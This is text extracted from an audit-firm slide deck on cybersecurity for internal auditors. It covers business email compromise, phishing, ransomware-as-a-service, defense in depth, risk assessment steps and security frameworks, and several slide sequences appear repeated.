THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
